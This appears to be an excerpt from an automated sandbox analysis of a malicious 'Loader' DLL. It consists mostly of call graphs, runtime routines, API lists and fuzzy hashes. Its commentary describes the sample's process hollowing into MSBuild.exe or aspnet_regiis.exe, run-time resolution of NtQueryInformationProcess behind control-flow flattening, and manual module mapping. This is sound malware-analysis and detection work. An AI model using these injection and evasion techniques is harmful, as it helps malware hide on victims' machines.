12836->12837 12839 6ce52ead 12837->12839 12840 6ce52ea9 12837->12840 12842 6ce54850 12837->12842 12847 6ce52ed1 12839->12847 12843 6ce5466f _free 5 API calls 12842->12843 12844 6ce5486c 12843->12844 12845 6ce5488a InitializeCriticalSectionAndSpinCount 12844->12845 12846 6ce54875 12844->12846 12845->12846 12846->12837 12848 6ce52efd 12847->12848 12849 6ce52ede 12847->12849 12848->12840 12850 6ce52ee8 DeleteCriticalSection 12849->12850 12850->12848 12850->12850 11520 6ce4ec44 11521 6ce4ec52 11520->11521 11522 6ce4ec4d 11520->11522 11526 6ce4eb0e 11521->11526 11541 6ce4ee28 11522->11541 11528 6ce4eb1a ___scrt_is_nonwritable_in_current_image 11526->11528 11527 6ce4eb43 dllmain_raw 11530 6ce4eb29 11527->11530 11531 6ce4eb5d dllmain_crt_dispatch 11527->11531 11528->11527 11529 6ce4eb3e 11528->11529 11528->11530 11545 6ce2e500 11529->11545 11531->11529 11531->11530 11534 6ce4ebaf 11534->11530 11535 6ce4ebb8 dllmain_crt_dispatch 11534->11535 11535->11530 11536 6ce4ebcb dllmain_raw 11535->11536 11536->11530 11537 6ce2e500 __DllMainCRTStartup@12 5 API calls 11538 6ce4eb96 11537->11538 11549 6ce4ea5e 11538->11549 11540 6ce4eba4 dllmain_raw 11540->11534 11542 6ce4ee3e 11541->11542 11544 6ce4ee47 11542->11544 11874 6ce4eddb GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 11542->11874 11544->11521 11546 6ce2e52a 11545->11546 11576 6ce4e890 11546->11576 11548 6ce2ec0b 11548->11534 11548->11537 11550 6ce4ea6a ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 11549->11550 11551 6ce4eb06 11550->11551 11552 6ce4ea9b 11550->11552 11568 6ce4ea73 11550->11568 11605 6ce4f194 IsProcessorFeaturePresent 11551->11605 11584 6ce4efc3 11552->11584 11555 6ce4eaa0 11593 6ce4ee7f 11555->11593 11557 6ce4eb0d ___scrt_is_nonwritable_in_current_image 11558 6ce4eb29 11557->11558 11559 6ce4eb43 dllmain_raw 11557->11559 11561 6ce4eb3e 11557->11561 11558->11540 11559->11558 11562 6ce4eb5d dllmain_crt_dispatch 11559->11562 11560 6ce4eaa5 __RTC_Initialize 
__DllMainCRTStartup@12 11596 6ce4f166 11560->11596 11565 6ce2e500 __DllMainCRTStartup@12 5 API calls 11561->11565 11562->11558 11562->11561 11567 6ce4eb7e 11565->11567 11569 6ce4ebaf 11567->11569 11572 6ce2e500 __DllMainCRTStartup@12 5 API calls 11567->11572 11568->11540 11569->11558 11570 6ce4ebb8 dllmain_crt_dispatch 11569->11570 11570->11558 11571 6ce4ebcb dllmain_raw 11570->11571 11571->11558 11573 6ce4eb96 11572->11573 11574 6ce4ea5e __DllMainCRTStartup@12 79 API calls 11573->11574 11575 6ce4eba4 dllmain_raw 11574->11575 11575->11569 11577 6ce4e898 11576->11577 11578 6ce4e899 IsProcessorFeaturePresent 11576->11578 11577->11548 11580 6ce4eca4 11578->11580 11583 6ce4ec67 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11580->11583 11582 6ce4ed87 11582->11548 11583->11582 11585 6ce4efc8 ___scrt_release_startup_lock 11584->11585 11586 6ce4efcc 11585->11586 11588 6ce4efd8 __DllMainCRTStartup@12 11585->11588 11609 6ce5249b 11586->11609 11590 6ce4efe5 11588->11590 11612 6ce51cfe 11588->11612 11590->11555 11746 6ce50ede InterlockedFlushSList 11593->11746 11597 6ce4f172 11596->11597 11598 6ce4eac4 11597->11598 11753 6ce52633 11597->11753 11602 6ce4eb00 11598->11602 11600 6ce4f180 11758 6ce50f36 11600->11758 11857 6ce4efe6 11602->11857 11606 6ce4f1aa __DllMainCRTStartup@12 std::bad_exception::bad_exception 11605->11606 11607 6ce4f255 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11606->11607 11608 6ce4f2a0 __DllMainCRTStartup@12 11607->11608 11608->11557 11623 6ce52366 11609->11623 11613 6ce51d0c 11612->11613 11621 6ce51d1d 11612->11621 11694 6ce51da4 GetModuleHandleW 11613->11694 11618 6ce51d57 11618->11555 11701 6ce51bc4 11621->11701 11624 6ce52372 ___scrt_is_nonwritable_in_current_image 11623->11624 11631 6ce52eba EnterCriticalSection 11624->11631 11626 6ce52380 11632 6ce523c1 11626->11632 11631->11626 11633 6ce523e0 11632->11633 11634 6ce5238d 11632->11634 11633->11634 11639 6ce52f67 11633->11639 11636 
6ce523b5 11634->11636 11693 6ce52f02 LeaveCriticalSection 11636->11693 11638 6ce4efd6 11638->11555 11640 6ce52f72 HeapFree 11639->11640 11641 6ce52f9b _free 11639->11641 11640->11641 11642 6ce52f87 11640->11642 11641->11634 11645 6ce5304b 11642->11645 11648 6ce52d7e GetLastError 11645->11648 11647 6ce52f8d GetLastError 11647->11641 11649 6ce52d95 11648->11649 11653 6ce52d9b 11648->11653 11671 6ce547cf 11649->11671 11669 6ce52da1 SetLastError 11653->11669 11676 6ce5480e 11653->11676 11657 6ce52dd1 11660 6ce5480e _free 6 API calls 11657->11660 11658 6ce52de8 11659 6ce5480e _free 6 API calls 11658->11659 11661 6ce52df4 11659->11661 11662 6ce52ddf 11660->11662 11663 6ce52e09 11661->11663 11664 6ce52df8 11661->11664 11667 6ce52f67 _free 12 API calls 11662->11667 11688 6ce52a29 11663->11688 11665 6ce5480e _free 6 API calls 11664->11665 11665->11662 11667->11669 11669->11647 11670 6ce52f67 _free 12 API calls 11670->11669 11672 6ce5466f _free 5 API calls 11671->11672 11673 6ce547eb 11672->11673 11674 6ce547f4 11673->11674 11675 6ce54806 TlsGetValue 11673->11675 11674->11653 11677 6ce5466f _free 5 API calls 11676->11677 11678 6ce5482a 11677->11678 11679 6ce52db9 11678->11679 11680 6ce54848 TlsSetValue 11678->11680 11679->11669 11681 6ce5305e 11679->11681 11686 6ce5306b _free 11681->11686 11682 6ce530ab 11685 6ce5304b _free 13 API calls 11682->11685 11683 6ce53096 HeapAlloc 11684 6ce52dc9 11683->11684 11683->11686 11684->11657 11684->11658 11685->11684 11686->11682 11686->11683 11687 6ce5192a _free EnterCriticalSection LeaveCriticalSection 11686->11687 11687->11686 11689 6ce528bd _free EnterCriticalSection LeaveCriticalSection 11688->11689 11690 6ce52a97 11689->11690 11691 6ce529cf _free 14 API calls 11690->11691 11692 6ce52ac0 11691->11692 11692->11670 11693->11638 11695 6ce51d11 11694->11695 11695->11621 11696 6ce51de7 GetModuleHandleExW 11695->11696 11697 6ce51e06 GetProcAddress 11696->11697 11698 6ce51e1b 11696->11698 11697->11698 11699 6ce51e2f FreeLibrary 11698->11699 
11700 6ce51e38 11698->11700 11699->11700 11700->11621 11702 6ce51bd0 ___scrt_is_nonwritable_in_current_image 11701->11702 11717 6ce52eba EnterCriticalSection 11702->11717 11704 6ce51bda 11718 6ce51c11 11704->11718 11706 6ce51be7 11722 6ce51c05 11706->11722 11709 6ce51d62 11726 6ce52fa1 GetPEB 11709->11726 11712 6ce51d91 11715 6ce51de7 __DllMainCRTStartup@12 3 API calls 11712->11715 11713 6ce51d71 GetPEB 11713->11712 11714 6ce51d81 GetCurrentProcess TerminateProcess 11713->11714 11714->11712 11716 6ce51d99 ExitProcess 11715->11716 11717->11704 11719 6ce51c1d ___scrt_is_nonwritable_in_current_image 11718->11719 11720 6ce5249b __DllMainCRTStartup@12 14 API calls 11719->11720 11721 6ce51c7e __DllMainCRTStartup@12 11719->11721 11720->11721 11721->11706 11725 6ce52f02 LeaveCriticalSection 11722->11725 11724 6ce51bf3 11724->11618 11724->11709 11725->11724 11727 6ce52fbb 11726->11727 11728 6ce51d6c 11726->11728 11730 6ce546f2 11727->11730 11728->11712 11728->11713 11733 6ce5466f 11730->11733 11732 6ce5470e 11732->11728 11734 6ce5469d 11733->11734 11737 6ce54699 _free 11733->11737 11734->11737 11739 6ce545a8 11734->11739 11737->11732 11738 6ce546b7 GetProcAddress 11738->11737 11742 6ce545b9 ___vcrt_FlsSetValue 11739->11742 11740 6ce54664 11740->11737 11740->11738 11741 6ce545d7 LoadLibraryExW 11741->11742 11743 6ce545f2 GetLastError 11741->11743 11742->11740 11742->11741 11744 6ce5464d FreeLibrary 11742->11744 11745 6ce54625 LoadLibraryExW 11742->11745 11743->11742 11744->11742 11745->11742 11748 6ce50eee 11746->11748 11749 6ce4ee89 11746->11749 11748->11749 11750 6ce519be 11748->11750 11749->11560 11751 6ce52f67 _free 14 API calls 11750->11751 11752 6ce519d6 11751->11752 11752->11748 11754 6ce52650 ___scrt_uninitialize_crt 11753->11754 11755 6ce5263e 11753->11755 11754->11600 11756 6ce5264c 11755->11756 11764 6ce5521d 11755->11764 11756->11600 11759 6ce50f3f 11758->11759 11760 6ce50f49 11758->11760 11830 6ce5131c 11759->11830 11760->11598 11767 6ce550cb 11764->11767 11770 
6ce5501f 11767->11770 11771 6ce5502b ___scrt_is_nonwritable_in_current_image 11770->11771 11778 6ce52eba EnterCriticalSection 11771->11778 11773 6ce550a1 11787 6ce550bf 11773->11787 11774 6ce55035 ___scrt_uninitialize_crt 11774->11773 11779 6ce54f93 11774->11779 11778->11774 11780 6ce54f9f ___scrt_is_nonwritable_in_current_image 11779->11780 11790 6ce5533a EnterCriticalSection 11780->11790 11782 6ce54fa9 ___scrt_uninitialize_crt 11786 6ce54fe2 11782->11786 11791 6ce551d5 11782->11791 11801 6ce55013 11786->11801 11829 6ce52f02 LeaveCriticalSection 11787->11829 11789 6ce550ad 11789->11756 11790->11782 11792 6ce551e2 11791->11792 11793 6ce551eb 11791->11793 11794 6ce550cb ___scrt_uninitialize_crt 66 API calls 11792->11794 11804 6ce55170 11793->11804 11796 6ce551e8 11794->11796 11796->11786 11799 6ce55207 11817 6ce567f2 11799->11817 11828 6ce5534e LeaveCriticalSection 11801->11828 11803 6ce55001 11803->11774 11805 6ce551ad 11804->11805 11806 6ce55188 11804->11806 11805->11796 11810 6ce55518 11805->11810 11806->11805 11807 6ce55518 ___scrt_uninitialize_crt 25 API calls 11806->11807 11808 6ce551a6 11807->11808 11809 6ce56fea ___scrt_uninitialize_crt 62 API calls 11808->11809 11809->11805 11811 6ce55524 11810->11811 11812 6ce55539 11810->11812 11813 6ce5304b _free 14 API calls 11811->11813 11812->11799 11814 6ce55529 11813->11814 11815 6ce51828 ___std_exception_copy 25 API calls 11814->11815 11816 6ce55534 11815->11816 11816->11799 11818 6ce56803 11817->11818 11819 6ce56810 11817->11819 11821 6ce5304b _free 14 API calls 11818->11821 11820 6ce56859 11819->11820 11823 6ce56837 11819->11823 11822 6ce5304b _free 14 API calls 11820->11822 11827 6ce56808 11821->11827 11824 6ce5685e 11822->11824 11825 6ce56750 ___scrt_uninitialize_crt 29 API calls 11823->11825 11826 6ce51828 ___std_exception_copy 25 API calls 11824->11826 11825->11827 11826->11827 11827->11796 11828->11803 11829->11789 11831 6ce50f44 11830->11831 11832 6ce51326 11830->11832 11834 6ce51373 11831->11834 11838 
6ce514f1 11832->11838 11835 6ce5137e 11834->11835 11837 6ce5139d 11834->11837 11836 6ce51388 DeleteCriticalSection 11835->11836 11836->11836 11836->11837 11837->11760 11843 6ce5146d 11838->11843 11841 6ce51523 TlsFree 11842 6ce51517 11841->11842 11842->11831 11844 6ce51485 11843->11844 11845 6ce514a8 11843->11845 11844->11845 11849 6ce513d3 11844->11849 11845->11841 11845->11842 11848 6ce5149a GetProcAddress 11848->11845 11854 6ce513df ___vcrt_FlsSetValue 11849->11854 11850 6ce51453 11850->11845 11850->11848 11851 6ce513f5 LoadLibraryExW 11852 6ce51413 GetLastError 11851->11852 11853 6ce5145a 11851->11853 11852->11854 11853->11850 11855 6ce51462 FreeLibrary 11853->11855 11854->11850 11854->11851 11856 6ce51435 LoadLibraryExW 11854->11856 11855->11850 11856->11853 11856->11854 11862 6ce52663 11857->11862 11860 6ce5131c ___vcrt_uninitialize_ptd 6 API calls 11861 6ce4eb05 11860->11861 11861->11568 11865 6ce52e5f 11862->11865 11866 6ce52e69 11865->11866 11868 6ce4efed 11865->11868 11869 6ce54790 11866->11869 11868->11860 11870 6ce5466f _free 5 API calls 11869->11870 11871 6ce547ac 11870->11871 11872 6ce547b5 11871->11872 11873 6ce547c7 TlsFree 11871->11873 11872->11868 11874->11544 11875 6ce4e904 11876 6ce4e942 11875->11876 11877 6ce4e90f 11875->11877 11878 6ce4ea5e __DllMainCRTStartup@12 84 API calls 11876->11878 11879 6ce4e934 11877->11879 11880 6ce4e914 11877->11880 11886 6ce4e91e 11878->11886 11887 6ce4e957 11879->11887 11882 6ce4e919 11880->11882 11883 6ce4e92a 11880->11883 11882->11886 11901 6ce4ef82 11882->11901 11906 6ce4ef63 11883->11906 11888 6ce4e963 ___scrt_is_nonwritable_in_current_image 11887->11888 11914 6ce4eff5 11888->11914 11890 6ce4e96a __DllMainCRTStartup@12 11891 6ce4ea56 11890->11891 11892 6ce4e991 11890->11892 11898 6ce4e9cd ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 11890->11898 11894 6ce4f194 __DllMainCRTStartup@12 4 API calls 11891->11894 11922 6ce4ef55 11892->11922 11895 6ce4ea5d 11894->11895 11896 6ce4e9a0 
Call graph (interactive graph flattened to text; all node addresses lie in the module mapped at 6CE10000). The nodes are MSVC CRT start-up, per-thread-data and tear-down code rather than sample logic. Call sites recoverable from the listing:
• DLL start-up: __RTC_Initialize, InitializeSListHead (6ce4ee73), ___scrt_release_startup_lock, __DllMainCRTStartup@12 (6ce4f194), IsProcessorFeaturePresent (6ce4f358)
• Per-thread data and locks: ___vcrt_FlsSetValue / ___vcrt_FlsGetValue wrapping TlsAlloc (6ce514e9), TlsSetValue (6ce5159c) and TlsGetValue (6ce5155e); InitializeCriticalSectionAndSpinCount (6ce515dd); EnterCriticalSection (6ce52eba) / LeaveCriticalSection (6ce52f02); GetLastError (6ce51263) / SetLastError (6ce512dd)
• Tear-down: ___scrt_uninitialize_crt (6ce50f36), ___vcrt_uninitialize_locks with DeleteCriticalSection (6ce51373), ___vcrt_uninitialize_ptd (6ce5131c), repeated _free wrappers (6ce52f67, 6ce547cf, 6ce5480e, 6ce52d7e, 6ce5304b, 6ce5305e), __fassign, HeapReAlloc (6ce5642f)
• Exceptions and stack cookies: ___std_exception_copy (6ce51828, 6ce51855), ___std_exception_destroy (6ce519be), std::bad_exception::bad_exception (6ce47250), _ValidateLocalCookies (6ce4e890)
• Fatal-error path at 6ce4c330, reached from 6ce2f5d0: IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID: Virtual$Memory$Write$ThreadWindow$AllocateCloseHandle$ConsoleContextShow$CreateReadResume$AllocProcess
• String ID: 55i$7'a$8Q,Q$?8%~$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$D&5{$MZx$Nvkf$RNS$VW(E$h<x$h<x$kernel32.dll$ntdll.dll$rSt$$rSt$$ut-M$ x7$ x7$\rf$\rf
• API String ID: 1660976819-3335305182
• Opcode ID: 22b972f553901dcf639869b9a5766a68276dc9c7b46454740df47b7922dfc3de
• Instruction ID: 9a66974f5235196f622c622235881f00396dce1ea5239894ba2b3a4b4e48dc23
• Opcode Fuzzy Hash: 22b972f553901dcf639869b9a5766a68276dc9c7b46454740df47b7922dfc3de
• Instruction Fuzzy Hash: 2FA30032B456608FDB18CE3CD9957CE77F2AB87319F204299D459DB780D2398A4ACF42
The API word set (fragments of VirtualAlloc/VirtualAllocEx, WriteProcessMemory, Get/SetThreadContext, ResumeThread, CreateProcess and ShowWindow) together with the two hard-coded .NET Framework binaries in the string table is the profile of a process-hollowing routine: MSBuild.exe and aspnet_regiis.exe are the likely host processes for the injected payload. In process-creation telemetry this shows up as one of those signed Microsoft binaries being started from the Loader.exe process (presumably suspended, given the ResumeThread fragment) and then resumed after remote memory writes.
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID: FileHandle$Close$Create$ProtectVirtual$Module$CurrentInformationMappingNameProcessView
• String ID: %D%$ %D%$@$M.nC$M.nC$g'<$$nKJb$u5.$nas$u41
• API String ID: 1716851264-1750082930
• Opcode ID: 0385f65a332dfcb4a89bcf70f938c77471d76eb8b5f060c28bd19b5b70591e14
• Instruction ID: aeb114c1a6dbd187652603ffac34477eecc73ab33a7b58509fb99c8a8209e64c
• Opcode Fuzzy Hash: 0385f65a332dfcb4a89bcf70f938c77471d76eb8b5f060c28bd19b5b70591e14
• Instruction Fuzzy Hash: 60631236B442558FCB08CE3CD9D53DE77F3AB47364F208659D419CB794D63A8A4A8B02
The word set here is consistent with CreateFile, CreateFileMapping, MapViewOfFile, VirtualProtect, GetModuleHandle/GetModuleFileName, GetCurrentProcess and CloseHandle: the function maps a file-backed copy of a module into its own process and changes page protections, the sequence used to restore a clean copy of a hooked DLL or to map code manually. Which module is opened is not recoverable from the visible strings, so the target should be confirmed from the file-access events of the report rather than assumed.

Control-flow Graph

control_flow_graph for the function at 6ce26e60 (interactive graph flattened to text; the executed/not-executed colouring of the original graph is not recoverable). Structure visible in the listing: a dispatcher block at 6ce26eb9-6ce26ec4 feeds a chain of over fifty short compare-and-branch blocks (from 6ce26eca-6ce26ed7 through 6ce272df-6ce272e4); each selects one handler block, and every handler ends at 6ce27f1a, which jumps back to the dispatcher. That shape is consistent with control-flow flattening. Handlers with named calls:
• 6ce274f5-6ce2751f: GetModuleHandleW
• 6ce27524-6ce27570: call 6ce24460, call 6ce4f660
• 6ce27575-6ce275c2: NtQueryInformationProcess
• 6ce27d72-6ce27d8c: call 6ce4e890 (_ValidateLocalCookies)
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID: (none; no statically resolved import is attributed to this function)
• String ID: $|&|$$|&|$NtQueryInformationProcess$[3.5$`gH$`gH$ntdll.dll$x5Zr$x5Zr
• API String ID: 0-1907433695
• Opcode ID: 6a3de3096ddca1517a85b395a26e16f33202c3c922e5847cfb87d915748dac9d
• Instruction ID: 5f19846400457b34d797e28004269c0791ff6cf612188d09e8dde89fd7d880d1
• Opcode Fuzzy Hash: 6a3de3096ddca1517a85b395a26e16f33202c3c922e5847cfb87d915748dac9d
• Instruction Fuzzy Hash: 9E923336A442018FDB08CEBCD5A63CE7BF2AB47318F348519E415DBB94D22E990BCB55
The empty API ID and the literal strings "ntdll.dll" and "NtQueryInformationProcess" show that this function resolves the native call by name at run time (GetModuleHandleW appears in the flattened graph immediately before the NtQueryInformationProcess call site), which is why import-based detection misses it. The ProcessInformationClass it requests is not shown in this block, so whether the call is an anti-debug check (such as ProcessDebugPort) or an ordinary environment query cannot be decided from this listing alone; it has to be read from the call site's arguments.

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 1494 6ce4ea5e-6ce4ea71 call 6ce4f310 1497 6ce4ea77-6ce4ea99 call 6ce4eef8 1494->1497 1498 6ce4ea73-6ce4ea75 1494->1498 1502 6ce4eb06-6ce4eb1f call 6ce4f194 call 6ce4f310 1497->1502 1503 6ce4ea9b-6ce4eade call 6ce4efc3 call 6ce4ee7f call 6ce4f2e3 call 6ce4eaf3 call 6ce4f166 call 6ce4eb00 1497->1503 1499 6ce4eae0-6ce4eaef 1498->1499 1514 6ce4eb30-6ce4eb37 1502->1514 1515 6ce4eb21-6ce4eb27 1502->1515 1503->1499 1518 6ce4eb43-6ce4eb57 dllmain_raw 1514->1518 1519 6ce4eb39-6ce4eb3c 1514->1519 1515->1514 1517 6ce4eb29-6ce4eb2b 1515->1517 1521 6ce4ec09-6ce4ec18 1517->1521 1524 6ce4ec00-6ce4ec07 1518->1524 1525 6ce4eb5d-6ce4eb6e dllmain_crt_dispatch 1518->1525 1519->1518 1522 6ce4eb3e-6ce4eb41 1519->1522 1526 6ce4eb74-6ce4eb86 call 6ce2e500 1522->1526 1524->1521 1525->1524 1525->1526 1533 6ce4ebaf-6ce4ebb1 1526->1533 1534 6ce4eb88-6ce4eb8a 1526->1534 1535 6ce4ebb3-6ce4ebb6 1533->1535 1536 6ce4ebb8-6ce4ebc9 dllmain_crt_dispatch 1533->1536 1534->1533 1537 6ce4eb8c-6ce4ebaa call 6ce2e500 call 6ce4ea5e dllmain_raw 1534->1537 1535->1524 1535->1536 1536->1524 1538 6ce4ebcb-6ce4ebfd dllmain_raw 1536->1538 1537->1533 1538->1524
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __RTC_Initialize.LIBCMT ref: 6CE4EAA5
                                                                                                                                                                                                                                                                  • ___scrt_uninitialize_crt.LIBCMT ref: 6CE4EABF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2442719207-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8ce2455d9d80528d713aa44957473fffb887b12d3e2701af6bb49569540adf43
                                                                                                                                                                                                                                                                  • Instruction ID: 43a2253ff515f423baac78948ffa5fac034dc068c4bda9a771a65c69bf51eea8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ce2455d9d80528d713aa44957473fffb887b12d3e2701af6bb49569540adf43
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD41E072A01A54AEDB20CF99E840BEEBA74EF4176CF308519E81567B80C7349A05CBD0

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 1544 6ce4eb0e-6ce4eb1f call 6ce4f310 1547 6ce4eb30-6ce4eb37 1544->1547 1548 6ce4eb21-6ce4eb27 1544->1548 1550 6ce4eb43-6ce4eb57 dllmain_raw 1547->1550 1551 6ce4eb39-6ce4eb3c 1547->1551 1548->1547 1549 6ce4eb29-6ce4eb2b 1548->1549 1552 6ce4ec09-6ce4ec18 1549->1552 1554 6ce4ec00-6ce4ec07 1550->1554 1555 6ce4eb5d-6ce4eb6e dllmain_crt_dispatch 1550->1555 1551->1550 1553 6ce4eb3e-6ce4eb41 1551->1553 1556 6ce4eb74-6ce4eb86 call 6ce2e500 1553->1556 1554->1552 1555->1554 1555->1556 1559 6ce4ebaf-6ce4ebb1 1556->1559 1560 6ce4eb88-6ce4eb8a 1556->1560 1561 6ce4ebb3-6ce4ebb6 1559->1561 1562 6ce4ebb8-6ce4ebc9 dllmain_crt_dispatch 1559->1562 1560->1559 1563 6ce4eb8c-6ce4ebaa call 6ce2e500 call 6ce4ea5e dllmain_raw 1560->1563 1561->1554 1561->1562 1562->1554 1564 6ce4ebcb-6ce4ebfd dllmain_raw 1562->1564 1563->1559 1564->1554
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3136044242-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2fd5e25e168075f962f0d09e985b328b5c63c9465f90288e59ff7d7f5970064e
                                                                                                                                                                                                                                                                  • Instruction ID: c13799d40846267dd7b0183cab36a02ee1c14223fee25d57803f805e961f12ca
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fd5e25e168075f962f0d09e985b328b5c63c9465f90288e59ff7d7f5970064e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9821BF71D01E68AACB21CE55EC44ABFBA79EB81B9CF318519F81567B50D3318D418BD0

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 1570 6ce4e957-6ce4e965 call 6ce4f310 call 6ce4eff5 1574 6ce4e96a-6ce4e96d 1570->1574 1575 6ce4ea44 1574->1575 1576 6ce4e973-6ce4e98b call 6ce4eef8 1574->1576 1577 6ce4ea46-6ce4ea55 1575->1577 1580 6ce4ea56-6ce4ea5d call 6ce4f194 1576->1580 1581 6ce4e991-6ce4e9a2 call 6ce4ef55 1576->1581 1586 6ce4e9a4-6ce4e9c6 call 6ce4f2b7 call 6ce4ee73 call 6ce4ee97 call 6ce51a1e 1581->1586 1587 6ce4e9f1-6ce4e9ff call 6ce4ea3a 1581->1587 1586->1587 1606 6ce4e9c8-6ce4e9cf call 6ce4ef2a 1586->1606 1587->1575 1592 6ce4ea01-6ce4ea0b call 6ce4f18e 1587->1592 1598 6ce4ea2c-6ce4ea35 1592->1598 1599 6ce4ea0d-6ce4ea16 call 6ce4f0b5 1592->1599 1598->1577 1599->1598 1605 6ce4ea18-6ce4ea2a 1599->1605 1605->1598 1606->1587 1610 6ce4e9d1-6ce4e9ee call 6ce519d9 1606->1610 1610->1587
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __RTC_Initialize.LIBCMT ref: 6CE4E9A4
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE4EE73: InitializeSListHead.KERNEL32(6CEADC50,6CE4E9AE,6CE5F880,00000010,6CE4E93F,?,?,?,6CE4EB67,?,00000001,?,?,00000001,?,6CE5F8C8), ref: 6CE4EE78
                                                                                                                                                                                                                                                                  • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CE4EA0E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
